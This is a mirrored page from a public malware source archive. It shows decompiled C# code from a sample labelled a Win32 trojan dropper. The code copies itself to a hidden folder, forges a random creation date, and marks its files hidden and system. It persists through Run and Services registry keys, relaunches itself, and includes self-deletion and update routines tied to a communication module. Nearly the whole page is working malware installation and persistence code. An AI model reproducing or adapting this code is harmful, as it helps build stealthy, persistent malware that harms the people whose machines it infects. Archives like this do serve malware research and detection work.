mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
189 lines
5.7 KiB
C#
189 lines
5.7 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: Poly._Install
|
|
// Assembly: Poly, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 618F3010-979B-4F78-8F99-D5C35E30AA2E
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc.exe
|
|
|
|
using Microsoft.Win32;
|
|
using System;
|
|
using System.Diagnostics;
|
|
using System.IO;
|
|
using System.Threading;
|
|
|
|
namespace Poly
|
|
{
|
|
internal class _Install : Base_Settings
|
|
{
|
|
public override void Initialise()
|
|
{
|
|
if (!Base_Settings.wait)
|
|
{
|
|
Console.WriteLine("Install called...");
|
|
this.Install();
|
|
}
|
|
else
|
|
{
|
|
while (Base_Settings.wait)
|
|
{
|
|
Console.WriteLine("Sleeping just in time...");
|
|
Thread.Sleep(5000);
|
|
}
|
|
if (Base_Settings.wait)
|
|
return;
|
|
Console.WriteLine("Installing");
|
|
this.Install();
|
|
}
|
|
}
|
|
|
|
public override void Run()
|
|
{
|
|
}
|
|
|
|
private void Install()
|
|
{
|
|
if (!Base_Settings.isExePath())
|
|
{
|
|
Console.WriteLine("Copying to specified disk location");
|
|
this.Drop();
|
|
this.WriteRegistry();
|
|
Console.WriteLine("Successfully copied. Attempting to start process");
|
|
Process.Start(Base_Settings.filePath + Base_Settings.fileName);
|
|
Process.GetCurrentProcess().Kill();
|
|
}
|
|
else
|
|
{
|
|
this.Drop();
|
|
this.WriteRegistry();
|
|
Base_Settings.status = "Installed!";
|
|
}
|
|
}
|
|
|
|
private void Drop()
|
|
{
|
|
Console.WriteLine("Install Path is " + Base_Settings.filePath);
|
|
try
|
|
{
|
|
if (!Directory.Exists(Base_Settings.filePath))
|
|
Directory.CreateDirectory(Base_Settings.filePath);
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
Console.WriteLine("Directory Not Found... Creating new one at" + Base_Settings.filePath + "\n" + ex.ToString());
|
|
}
|
|
try
|
|
{
|
|
string str = Base_Settings.filePath + Base_Settings.fileName;
|
|
Console.WriteLine("Moving to {0}", (object) str);
|
|
if (!API.MoveFileEx(Process.GetCurrentProcess().MainModule.FileName, str, API.MoveFileFlags.MOVEFILE_REPLACE_EXISTING))
|
|
File.Copy(Process.GetCurrentProcess().MainModule.FileName, str, true);
|
|
Console.WriteLine("File successfully moved to {0}", (object) (Base_Settings.filePath + Base_Settings.fileName));
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
Console.WriteLine("Could Not copy file to specified folder\n" + ex.ToString());
|
|
}
|
|
try
|
|
{
|
|
Random random = new Random();
|
|
int day = random.Next(1, 28);
|
|
int month = random.Next(1, 12);
|
|
int year = random.Next(2000, DateTime.Now.Year);
|
|
Directory.SetCreationTime(Base_Settings.filePath + Base_Settings.fileName, new DateTime(year, month, day));
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
try
|
|
{
|
|
File.SetAttributes(Base_Settings.filePath, FileAttributes.ReadOnly | FileAttributes.Hidden | FileAttributes.NotContentIndexed);
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
try
|
|
{
|
|
File.SetAttributes(Path.Combine(Base_Settings.filePath, Base_Settings.fileName), FileAttributes.Hidden | FileAttributes.System | FileAttributes.NotContentIndexed);
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
}
|
|
|
|
public void WriteRegistry()
|
|
{
|
|
try
|
|
{
|
|
if (!Base_Settings.isAdmin)
|
|
Registry.CurrentUser.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run").SetValue(Base_Settings.regName, (object) Path.Combine(Base_Settings.filePath, Base_Settings.fileName));
|
|
else
|
|
Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run").SetValue(Base_Settings.regName, (object) Path.Combine(Base_Settings.filePath, Base_Settings.fileName));
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
try
|
|
{
|
|
if (!Base_Settings.isAdmin)
|
|
return;
|
|
Registry.CurrentUser.CreateSubKey("SYSTEM\\CurrentControlSet\\Services").SetValue(Base_Settings.regName, (object) Path.Combine(Base_Settings.filePath, Base_Settings.fileName));
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
}
|
|
|
|
public static void Uninstall()
|
|
{
|
|
try
|
|
{
|
|
Base_Settings.status = "Removing";
|
|
if (!Base_Settings.isAdmin)
|
|
Registry.CurrentUser.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run").DeleteValue(Base_Settings.regName);
|
|
else
|
|
Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run").DeleteValue(Base_Settings.regName);
|
|
string tempFileName = Path.GetTempFileName();
|
|
File.Copy(Process.GetCurrentProcess().MainModule.FileName, tempFileName);
|
|
File.Delete(Base_Settings.filePath + Base_Settings.fileName);
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
_Install.QueueForDeletion();
|
|
Base_Settings.busy = false;
|
|
Thread.Sleep(10000);
|
|
Base_Settings.cleanUp();
|
|
}
|
|
|
|
public static void Update(string Path)
|
|
{
|
|
new Thread(new ThreadStart(_Install.Uninstall)).Start();
|
|
Base_Settings.status = "Updated";
|
|
_communicate.setReturn(1);
|
|
_communicate.forceTalk();
|
|
Process.Start(Path);
|
|
}
|
|
|
|
private static void QueueForDeletion()
|
|
{
|
|
try
|
|
{
|
|
string tempFileName = Path.GetTempFileName();
|
|
File.Delete(tempFileName);
|
|
File.Move(Process.GetCurrentProcess().MainModule.FileName, tempFileName);
|
|
try
|
|
{
|
|
Directory.Delete(Base_Settings.filePath, true);
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
API.MoveFileEx(tempFileName, (string) null, API.MoveFileFlags.MOVEFILE_DELAY_UNTIL_REBOOT);
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
Console.WriteLine(ex.Message);
|
|
}
|
|
}
|
|
}
|
|
}
|